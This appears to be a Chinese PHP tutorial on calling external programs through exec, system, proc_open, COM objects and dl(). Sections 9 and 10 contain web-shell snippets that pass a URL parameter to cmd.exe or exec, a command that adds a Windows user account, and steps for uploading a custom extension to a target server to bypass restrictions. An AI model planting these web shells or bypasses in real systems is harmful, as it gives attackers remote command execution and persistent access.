PHP调用外部程序的方法解析

目录
  • 前提:PHP没有运行在安全模式
    • 1. exec
    • 2. system
    • 3. passthru
    • 4. popen
    • 5. proc_open
    • 6. shell_exec
    • 7. 反撇号`
    • 8.cntl_exec
    • 10.  dl()
    • 11.  内核变量

很多情况下需要php调用其他程序如shell命令、shell脚本、可执行程序等等,此时需要使用到诸如exec/system/popen/proc_open等函数,每种函数有各自适合使用的场景以及需要注意的地方。

前提:PHP没有运行在安全模式

如果PHP运行在安全模式下,那么在执行外部命令、打开文件、连接数据库、基于HTTP的认证这4个方面将会受到制约,可能在调用外部程序时无法获取预期的结果,此时需要设置特定目录,可以在php.ini中编辑safe_mode_exec_dir参数来指定。

1. exec

原型:string exec ( string command [, array &output [, int &return_var]] )
描述:返回值保存最后的输出结果,而所有输出结果将会保存到$output数组,$return_var用来保存命令执行的状态码(用来检测成功或失败)。
例子:$ret = exec("ls -al", $output, $var);
注意:
A. 输出结果会逐行追加到$output中,因此在调用exec之前需要unset($output),特别是循环调用的时候。
B. 如果想通过exec调用外部程序后马上继续执行后续代码,仅仅在命令里加"&"是不够的,此时exec依然会等待命令执行完毕;需要再将标准输出做重定向才可以,例如:exec("ls -al >/dev/null &", $output, $var);
C. 要学会善用EscapeShellCmd()和EscapeShellArg()。函数EscapeShellCmd把一个字符串 中所有可能瞒过Shell而去执行另外一个命令的字符转义。这些字符在Shell中是有特殊含义的,象分号(|),重定向(>)和从文件读入 (<)等。函数EscapeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号,并把字符串中的单引号转义,这样这个字符串 就可以安全地作为命令的参数。

2. system

原型:string system ( string command [, int &return_var] )
描述:执行给定的命令,返回最后的输出结果;第二个参数是可选的,用来得到命令执行后的状态码。
例子:$ret = system("ls -al", $var);
注意:略。

3. passthru

原型:void passthru (string command [, int return_var])
描述:执行给定的命令,但不返回任何输出结果,而是直接输出到显示设备上;第二个参数可选,用来得到命令执行后的状态码。
例子:passthru("ls -al", $var);
注意:略。

4. popen

原型:resource popen ( string command, string mode )
描述:打开一个指向进程的管道,该进程由派生给定的 command 命令执行而产生。 返回一个和 fopen() 所返回的相同的文件指针,只不过它是单向的(只能用于读或写)并且必须用 pclose() 来关闭。此指针可以用于 fgets(),fgetss() 和 fwrite()。 
例子:$fd = popen("command", 'r'); $ret = fgets($fd);
注意:只能打开单向管道,不是'r'就是'w';并且需要使用pclose()来关闭。

5. proc_open

原型:resource proc_open ( string cmd, array descriptorspec, array &pipes [, string cwd [, array env [, array other_options]]] )
描述:与popen类似,但是可以提供双向管道。具体的参数读者可以自己翻阅资料,比如该博客: http://hi.baidu.com/alex_wang58/blog/item/a28657de16fec55195ee372a.html。
注意:
A. 后面需要使用proc_close()关闭资源,并且如果是pipe类型,需要用pclose()关闭句柄。
B. proc_open打开的程序作为php的子进程,php退出后该子进程也会退出。
C.  笔者在使用的时候遇到获取外部程序输出阻塞的问题,也就是在例子中的fgets($pipes[1])语句阻塞了,无法继续进行。经过多方查证后发现,问题一般出在外部程序中,比如外部程序是C程序,使用fprintf(stdin, "**** \n");输出结果,此时需要加上fflush(stdout);才行,否则输出结果可能会暂留缓存中,无法真正输出,而php也就无法获取输出了。
例子:

 // /< 打开管道
 $pwd   =   " ***** " ;
 $pipes   =   array ();
 $command   =   " ***** " ;
 $desc   =   array ( array ( ' pipe ' ,   ' r ' ) ,   array ( ' pipe ' ,   ' w ' ) ,   array ( ' pipe ' ,   ' w ' ));
 $handle   =   proc_open ( $command ,   $desc ,   $pipes ,   $pwd );
 if  ( ! is_resource ( $handle )) {
     fprintf (STDERR ,   " proc_open failed.\n " );
     exit ( 1 );
}
 // /< 读写
 fwrite ( $pipes [ 0 ] ,   " *****\n " );
 $ret   =   rtrim ( fgets ( $pipes [ 1 ]) ,   " \n " );
 // /< 关闭管道
 fclose ( $pipes [ 0 ]);
 fclose ( $pipes [ 1 ]);
 fclose ( $pipes [ 2 ]);
 proc_close ( $handle );

6. shell_exec

原型:string shell_exec ( string $cmd )
描述:cmd:要执行的命令    返回值:命令执行的输出。 如果执行过程中发生错误或者进程不产生输出,则返回 NULL。
例子:

<?php
        echo shell_exec('pwd');
?>

执行结果:/var/www/html

7. 反撇号`

描述:shell_exec() 函数实际上仅是反撇号 (`) 操作符的变体 

例子:

<?php
        echo `pwd`;
?>

执行结果:/var/www/html

8.cntl_exec

原型:void pcntl_exec ( string $path [, array $args [, array $envs ]] )
描述:(PHP 4 >= 4.2.0, PHP 5, PHP 7)
pcntl_exec — 在当前进程空间执行以给定参数执行指定程序。
pcntl是linux下的一个扩展,可以支持php的多线程操作。
参数:
path: 必须是可执行二进制文件路径或一个在文件第一行指定了一个可执行文件路径
标头的脚本(比如文件第一行是#!/usr/local/bin/perl的perl脚本)。 更多的
信息请查看您系统的execve(2)手册。
args: 一个要传递给程序的参数的字符串数组。
envs: 一个要传递给程序作为环境变量的字符串数组。这个数组是 key => value格
式的,key代表要传递的环境变量的名称,value代表该环境变量值。
返回值:当发生错误时返回 FALSE ,没有错误时没有返回。

9. COM组建(针对windwos环境下使用com组建)

原型:
Wscript.Shell->exec(command) //
Shell.Application->ShellExecute(appName,appArgs,appPath) //
Shell.Application->open(appPath) //要填写程序绝对路径,并且应该没有办法加参数
Shell.Application->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverb()
Shell.Application->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverbEx()
描述:在windwos下,并且在php中开启com组建扩展之后可以使用这种方法(打开方式自行百度)
彻底的解决方案是 直接删除System32目录下wshom.ocx文件
例子:

<?php
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");
$exec=$phpwsh->exec("cmd.exe /c ".$_GET['c']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>

<?php
$phpwsh=new COM("Shell.Application") or die("Create Wscript.Shell Failed!");
$exec=$phpwsh->ShellExecute("net"," user tiny tiny /add");
//$exec=$phpwsh->ShellExecute("cmd","/c net user tiny tiny /add");
?>

<?php
$phpwsh=new COM("Shell.Application") or die("Create Wscript.Shell Failed!");
$exec=$phpwsh->open("c:\\windows\\system32\\cmd.exe");
?>

<?php
$a=new COM("Shell.Application");
$a->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverb();
?>

<?php
$a=new COM("Shell.Application");
$a->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverbEx();
?>

10.  dl()

要求:php没有开启安全模式,并且enable_dl选项为on,并且php版本支持dl函数
(在 PHP 5.3 里,此函数被某些 SAPI 移除了,也就是没有这个函数?)
说明:extension_dir选项可以指定扩展模块的目录,但是我们可以使用相对路径的方式绕过
原理:自己编写扩展,然后使用dl加载此扩展。
举例(linux):
准备工作:
自行上网下载apache和相近版本的php源码,按照apache和php的官方文档进行安装。
我们主要需要三个文件:phpize,php-config和ext_skel:在正确安装好了apache和php之后,
phpize和php-config将被安装(可以自行find),而ext_skel则是是在php源码中的ext目录中。
ext_skel是php源码包中的用来帮助制作扩展的程序。
1)转到php-x.x.xx/ext中首先新建xxx.skel文件,里面填写要制作的扩展中的函数原型,例如:
string exec(string str)
2)执行命令:./ext_skel --extname=tinymin --proto=xxx.skel 之后便生成了tinymin目录,
里面则是扩展所需要的文件
3)cd tinymin
4)vi config.m4 
将 config.m4文件里面
dnl PHP_ARG_WITH(myext, for myext support,
dnl Make sure that the comment is aligned:
dnl [ --with-myext Include myext support])
修改成
PHP_ARG_WITH(myext, for myext support,
[ --with-myext Include myext support])
5)vi tinymin.c
将PHP_FUNCTION(exec)后面的大括号里面的代码的最后一行删除,并写上自己的代码,修改后如:PHP_FUNCTION(haha)
{
char *str = NULL;
int argc = ZEND_NUM_ARGS();
int str_len;

if (zend_parse_parameters(argc TSRMLS_CC, "s", &str, &str_len) == FAILURE) 
return;

return system(str);
}
6)找到phpize:find / -name "phpize" 然后运行一下phpize:
/my_lamp/php/bin/phpize
7) 同样方式找到php-config,然后运行configure:
./configure --with-php-config=/my_lamp/php/bin/php-config
8)make&&make install 
之后便在自己的php扩展目录中生成了扩展tinymin.so
在目标服务器上面上传tinymin.so(不一定要在它的php扩展目录中,因为可以使用相对路径)
用法例如:
<?php
dl("../../../../../tmp/tinymin.so");
echo exec($_GET['cmd']);
?>
这种方法也很老了,我在自己的的kali2上面尝试这样做的时候提示没有dl这个函数,具体原因参见php manual
windows上应该也是一样的原理。不过没有试过

11.  内核变量

网址:http://www.freebuf.com/articles/web/82801.html 

以上就是PHP调用外部程序的方法解析的详细内容,更多关于PHP调用外部程序的方法的资料请关注我们其它相关文章!

(0)

相关推荐

  • PHP中如何防止外部恶意提交调用ajax接口

    我们自己网站写好的ajax接口,如果给自己用,那就限定一下来路域名,判断一下来路即可. 注意:将www.jb51.net替换成你自己的域名. 复制代码 代码如下: //判断来路 if(!isset($_SERVER['HTTP_REFERER']) || !stripos($_SERVER['HTTP_REFERER'],'www.jb51.net')) {  echo 'cann`t access';  exit(); }

  • yiic命令时提示“php.exe”不是内部或外部命令的解决方法

    本文实例讲述了yiic命令时提示"php.exe"不是内部或外部命令的解决方法,分享给大家供大家参考.具体方法如下: 在CMD中运行 yiic webapp work 如果报"php.exe"不是内部命令,是这样的:原因是Yii自带的yiic.bat找不到php.exe. 解决方法: 因为没有加入环境变量,所以无法直接执行php.exe. 右击"我的电脑->属性->高级->环境变量->系统变量->PATH->编辑&quo

  • PHP实现删除非站内外部链接实例代码

    一般在做网站系统的时候,出于优化等因素的考虑需要再添加文章的时候删除掉不是本站的链接,对于这一要求可以通过让PHP处理下文章内容,来达到文章外部链接的自动删除的效果. 本实例代码主要参考织梦CMS内容管理系统的外链删除方法. 复制代码 代码如下: /** *  删除非站内链接 * * @access    public * @param     string  $body  内容 * @param     array  $allow_urls  允许的超链接 * @return    strin

  • PHP实现函数内修改外部变量值的方法示例

    本文实例讲述了PHP实现函数内修改外部变量值的方法.分享给大家供大家参考,具体如下: 直接上代码,如下: $a_str = 'ab'; function change_val(){ global $a_str; // 通过设置全局变量,修改变量值 //$a_str = 'abc'; $a_str = $a_str.'abc'; } echo $a_str."<br>"; change_val(); echo $a_str."<br>"; ec

  • php绘图之加载外部图片的方法

    本文实例讲述了php绘图之加载外部图片的方法.分享给大家供大家参考.具体实现方法如下: 在实际应用中,就是常见的水印功能. 复制代码 代码如下: <?php //1.创建画布 $im = imagecreatetruecolor(300,200);//新建一个真彩色图像,默认背景是黑色,返回图像标识符.另外还有一个函数 imagecreate 已经不推荐使用. //2.加载外部图片 $im_new = imagecreatefromjpeg("baidu.jpg");//返回图像

  • php外部执行命令函数用法小结

    本文实例讲述了php外部执行命令函数用法.分享给大家供大家参考,具体如下: 首先先要自我检讨一下的,学习和使用php已经前前后后一年多了,研究和使用Linux系统也差不多一年了,我居然不知道php这种解释型语言可以直接调用操作命令去操纵系统... 先总结下Linux的操作,常用的cd.cp.mv.rm之类的就不提了,值得总结的第一点是普通用户在提取root权限的时候需要在命令前加上sudo,然后在vi编辑器中输出行号的命令是 :set nu. php的内置函数exec,system都可以调用系统

  • PHP 执行系统外部命令 system() exec() passthru()

    区别: system() 输出并返回最后一行shell结果. exec() 不输出结果,返回最后一行shell结果,所有结果可以保存到一个返回的数组里面. passthru() 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上. 相同点:都可以获得命令执行的状态码 demo: 复制代码 代码如下: //system('dir'); // exec ('dir'); // passthru ('dir'); // echo `dir`; PHP作为一种服务器端的脚本语言,象编写简单,或者

  • PHP用反撇号执行外部命令

    例如: echo `whoami`; // 导出数据库,要导入的文件夹必须要有可写权限, -u -p之后的内容必须要紧挨着写 复制代码 代码如下: echo `mysqldump -h localhost -u$DbUser -p$DbPwd --default-character-set=utf8 $DbName > /var/$dumpFileName`; 反撇号其他用法 <?php #使用反撇号,暗示作为命令来执行 $result=`date`; echo "<p>

  • PHP 闭包获取外部变量和global关键字声明变量的区别讲解

    最近在学习workerman的时候比较频繁的接触到回调函数,使用中经常会因为worker的使用方式不同,会用这两种不同的方式去调用外部的worker变量,这里就整理一下PHP闭包获取外部变量和global关键字声明变量的区别. 闭包 闭包是一个常见的概念,我们通常可以将其与回调函数配合使用,可以使代码更加简洁易读. 闭包可以 通过拷贝的方式 让函数使用父作用域中的变量.如: $global = 'hello'; $bbb = function()use($global){ echo $globa

  • php判断正常访问和外部访问的示例

    php判断正常访问和外部访问 复制代码 代码如下: <?php session_start(); if(isset($_POST['check'])&&!empty($_POST['name'])){ if($_POST['check'] == $_SESSION['check']){ echo "正常访问"; }else{ echo "外部访问"; } } $token = md5(uniqid(rand(),true)); $_SESSIO

  • PHP实现执行外部程序的方法详解

    PHP实现执行外部程序的方法详解

    本文实例讲述了PHP实现执行外部程序的方法.分享给大家供大家参考,具体如下: 在一些特殊情况下,会使用PHP调用外部程序执行,比如:调用shell命令.shell脚本.可执行程序等等,今天在源码中了解了一下PHP执行外部程序的方法,借此机会顺便整理一下. 在源码中 exec.h文件中,列出了可调用外部程序的几个函数,蓝色框里的两个函数只是辅助作用,本文只对其他几个函数做介绍. 前提 1 PHP没有运行在安全模式,关掉安全模式,即:safe_mode = off 2 禁用函数列表 disable_

随机推荐